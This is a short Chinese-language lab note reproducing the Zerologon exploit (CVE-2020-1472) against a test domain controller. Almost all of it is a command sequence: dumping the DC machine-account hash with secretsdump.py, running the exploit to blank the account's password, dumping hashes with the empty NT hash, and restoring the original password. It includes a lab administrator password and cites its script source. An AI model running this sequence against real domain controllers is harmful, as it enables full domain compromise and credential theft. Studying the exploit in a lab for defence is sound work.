复现完了有点小BUG,重启后会卡在登录页面比较久。不知道是不是只有我会。(谨慎在真实环境利用) 实战中可以使用secretsdump.py 的 -use-vss和-history获取历史hash进行恢复.
第一步
pip3 install -r requirements.txt
查看hash
secretsdump.py molecule-labs.com/administrator:Aa123456.@192.168.175.132 -just-dc-user 'AD$'
攻击
python3 CVE-2020-1472.py AD AD$ 192.168.175.132
查询域控hash
secretsdump.py molecule-labs.com/'AD$'@192.168.175.132 -just-dc-user 'AD$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0
恢复hash
python3 reinstall_original_pw.py AD 192.168.175.132 061e8e521872fa93a2f8d89ca0683145
查询恢复后的hash
secretsdump.py molecule-labs.com/administrator:Aa123456.@192.168.175.132 -just-dc-user 'AD$'
脚本来源 https://github.com/blackarrowsec/redteam-research